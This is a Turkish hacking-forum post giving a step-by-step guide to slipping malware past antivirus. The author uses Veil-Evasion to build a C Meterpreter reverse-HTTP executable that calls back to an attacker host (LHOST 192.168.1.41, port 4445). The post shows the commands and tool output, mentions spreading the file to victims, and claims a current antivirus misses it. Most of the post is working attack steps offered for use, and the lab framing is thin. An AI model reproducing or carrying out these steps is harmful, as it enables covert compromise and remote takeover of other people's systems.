Antivirüs Atlatma (encoding)

  • Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

Bob-White

Member
Katılım
May 11, 2020
Mesajlar
23
Tepkime puanı
17
Puanları
3
Konum
Topraktan
Merhabalar bügün sizlere nasıl antivirüs atlatabiliriz göstereceğim eski arşivden buldum paylaşayım dedim😁Hadi go

Zararlı yazılımların encoding yöntemi ile antivirüslerden atlatılması.

Araçlar:

  • Veil-evasion master
  • Armitage
Lab Senaryosu:

Hedef sistemlerde saldırıların başarısızlıkla sonuçlanmasına sebep olan önlemlerden bir tanesi de antivirüs kullanımıdır. Antivirüsler imza tabanlı olarak çalışmaktadır bundan dolayı tanımadığı bir yazılımı veya davranışını tanımlayamadığı bir yazılımı tehdit olarak algılamamaktadır.

İlk olarak encoding edilmiş zararlı yazılımı oluşturmalıyız. Bu iş için veil-frame work kullanılacaktır;

Not: Veil-framework kurulumu eğitimlerimizde anlatılmaktadır.

Veil dizinine gidilerek program çalıştırılır;

root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py

Elde edilmesi beklenen ekran;

Veil.png

List komutu ile tüm olası payload çeşitleri listelenir;

[>] Please enter a command: list

Bu aşamada birçok zaralı yöntemi seçilebilmektedir.

Burada 3. sırada bulunan, C dilinde yazılmış ve saldırganın makinesine HTTP ile bağlantı isteği gönderecek olan bir payload seçilecektir.

[>] Please enter a command: 3
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: c/meterpreter/rev_http loaded

Bu aşamadan sonra saldırganın IP adresi ve port numarası girilip zararlı yazılımın bu standartlarda üretilmesi sağlanmalıdır.

Girilmesi gereken komutlar:

set LHOST 192.168.1.41
set LPORT 4445
generate

İlgili değişikliklerin gerçekleştirildiği alanlar ve sonuçları:

Required Options:
Name Current Value Description
---- ------------- -----------
LHOST IP of the metasploit handler
LPORT 8080 Port of the metasploit handler
compile_to_exe Y Compile to an executable

Available commands:

set set a specific option value
info show information about the payload
generate generate payload
back go to the main menu
exit exit Veil

[>] Please enter a command: set LHOST 192.168.1.41
[>] Please enter a command: set LPORT 4445
[>] Please enter a command: generate

=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: testme

=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

[*] Executable written to: /usr/share/veil-output/compiled/testme.exe

Language: c
Payload: c/meterpreter/rev_http
Required Options: LHOST=192.168.1.41 LPORT=4445 compile_to_exe=Y
Payload File: /usr/share/veil-output/source/testme.c
Handler File: /usr/share/veil-output/handlers/testme_handler.rc

[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)

Zararlı yazılımın oluşturulan dizini: /usr/share/veil-output/compiled/testme.exe

Zararlı yazılımın kurban sistemlere bulaştırılması için çeşitli yöntemler kullanılabilir.

Hedef sisteme bulaştırılan yazılımın, veritabanı güncel olan bir antivirüs ile taranma sonucu;

Avatlatma.png


Görüldüğü gibi zararlı yazılım olduğu tespit edilmemiştir.

Halbuki zararlı yazılım çalıştırıldığında saldırganın makinesine bağlantı oluşturulmakta ve sistem saldırganın eline geçmiş olmaktadır.Tuzak sistem olma ihtimaleride vardır.

Bob-White hiçbir şekilde oluşabilcek sorumlardan sorumludegildir.